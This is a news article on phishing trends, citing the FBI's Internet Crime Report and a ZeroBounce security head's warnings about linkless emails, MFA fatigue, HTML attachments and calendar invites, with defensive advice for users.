Phishing attacks become harder to spot as hackers adapt tactics

The FBI's Internet Crime Report has highlighted that phishing remains the most prevalent cybercrime in the United States, with more than 193,000 complaints recorded in the past year.

According to cybersecurity specialists at ZeroBounce, while phishing continues to be widespread, attackers are rapidly refining their techniques and successfully evading detection by employing a range of subtle and lesser-known tactics.

Among the emerging strategies is the use of linkless phishing attacks. The typical warning sign—suspicious links or attachments—is absent in these instances. Instead, cybercriminals send brief, benign-seeming emails such as "Are you free for a quick call?" or "Can you help me with this task?" intended to spark real-time interactions through phone or further email correspondence.

Vlad Cristescu, Head of Cybersecurity at ZeroBounce, said, "People are trained to spot suspicious links, but attackers have adapted by removing them altogether. Once you reply, they continue the impersonation, usually posing as a colleague or executive. If something feels off, don't respond directly. Verify through another channel before engaging."

An increasing concern is the manipulation of multi-factor authentication (MFA) processes. Attackers who have stolen login details can send a flurry of MFA push notifications, hoping to overwhelm users. They may then impersonate IT staff via email, urging the user to approve a single login attempt to cease the alerts.

"This is psychological warfare more than technical trickery," explains Cristescu. "It exploits a user's frustration and trust in IT. If you're receiving multiple MFA prompts you didn't initiate, that's not a glitch – it's an attack. Pause, don't approve, and escalate it immediately."

ZeroBounce has also noted cybercriminals' growing reliance on HTML attachments. These files often appear as typical business documents—such as invoices or shared files—but once opened, they mimic login screens and harvest user credentials.

"Users think, 'It's just an HTML file, what harm could it do?'" Vlad Cristescu notes. "But one click can open a cloned login page that captures your credentials instantly. Companies should restrict HTML attachments unless essential, and users should treat unfamiliar HTML files the same way they'd treat a suspicious link - don't open it unless you're absolutely sure of the sender."

Another increasing threat vector involves phishing attempts through calendar invitations. Instead of traditional email-based attacks, perpetrators are dispatching meeting invites containing malicious links, often embedded in the 'Join' button. Because these invitations integrate directly into users' calendars, they may not be scrutinised as regular emails.

"Calendar invites carry this built-in credibility – they're not usually scrutinised like emails," Cristescu explains. "But if you're getting meeting requests from unknown senders, or vague event titles like 'Sync' or 'Project Review,' treat those just like a phishing email. Disable auto-accept where possible and review every invite manually before clicking anything."

ZeroBounce has warned that the sophistication of modern phishing attacks lies in their subtlety. They increasingly resemble ordinary business communications, making them harder to detect and more dangerous to recipients.

"The biggest risk today is overconfidence," warns Vlad Cristescu, Head of Cybersecurity at ZeroBounce. "No matter how experienced you are, if you stop questioning what lands in your inbox – or your calendar – you're vulnerable. Awareness must evolve as fast as the threats do. Always verify the sender's email address, ensure that any link you click matches the legitimate domain, and look out for subtle red flags like spelling errors or unusual formatting. These small checks can make the difference between staying secure and falling for a well-crafted scam."